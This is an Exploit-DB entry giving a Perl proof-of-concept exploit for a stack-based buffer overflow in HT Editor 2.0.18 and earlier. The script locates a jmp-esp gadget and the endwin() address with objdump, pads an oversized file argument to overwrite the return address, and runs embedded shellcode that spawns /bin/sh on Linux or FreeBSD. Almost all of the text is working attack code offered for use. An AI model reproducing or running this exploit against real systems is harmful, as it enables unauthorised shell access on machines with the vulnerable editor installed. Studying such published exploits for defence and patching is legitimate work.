HT Editor 2.0.18 - File Opening Stack Overflow

EDB-ID:

17083

CVE:

N/A


Author:

ZadYree

Type:

local


Platform:

Linux

Date:

2011-03-30


# Exploit Title: HT Editor File openning Stack Overflow (0day)
# Date: March 30th 2011
# Author: ZadYree
# Software Link: http://hte.sourceforge.net/downloads.html
# Version: <= 2.0.18
# Tested on: Linux/Windows (buffer padding may differ on W32)
# CVE : None
#!/usr/bin/perl
=head1 TITLE

HT Editor <=2.0.18 0day Stack-Based Overflow Exploit


=head1 DESCRIPTION

The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.


=head2 AUTHOR

ZadYree ~ 3LRVS Team


=head3 SEE ALSO

ZadYree's blog: z4d.tuxfamily.org

3LRVS blog: 3lrvs.tuxfamily.org

Shellcodes based on
http://www.shell-storm.org/shellcode/files/shellcode-606.php
http://www.shell-storm.org/shellcode/files/shellcode-171.php

=> Thanks 
=cut
use 5.010;

my ($esp, $retaddr);
my $scz = 	[	"\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e" .
				"\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
				"\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
				"\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
				"\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
				"\x53\x52\x54\x8a\xe2\xce\x81",
				"\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" .
				"\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" .
				"\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" .
				"/bin/sh"	];

say'[*]Looking for $esp and endwin()...';

my $namez = [qw#/usr/bin/hte /usr/local/bin/ht#];

my $infos = get_infos(qx{uname});

my $name = $infos->[0];


say '[+]endwin() address found! (0x', $infos->[3],')';

for my $line(qx{objdump -D $name | grep "ff e4"}) {
	$esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
}

say '[+]$esp place found! (0x', $esp, ")\012Now exploiting...";

my @payload = ($infos->[0], ("A" x ($infos->[1] - length(qx{pwd}))) . reverse(pack('H*', $infos->[3])) . reverse(pack('H*', $esp)) . $infos->[2]);
exec(@payload);


sub get_infos {
	given(shift) {
		when(/Linux/) {
			return([$namez->[0], 4108, $scz->[0], getendwin("linux")]);
		}
		when(/FreeBSD/) {
			return([$namez->[1], 271, $scz->[1], getendwin("freebsd")]);
		}
		#Possibility to add friends ^^
	}
}

sub getendwin {
	given(shift) {
		when("linux") {
			my $n = $namez->[0];
			for (qx{objdump -d $n | grep endwin}) {
				$retaddr = $1, last if ($_ =~ m{(.*) <});
			}
			return($retaddr);
		}
		when("freebsd") {
			return("282c2990");
		}
	}
}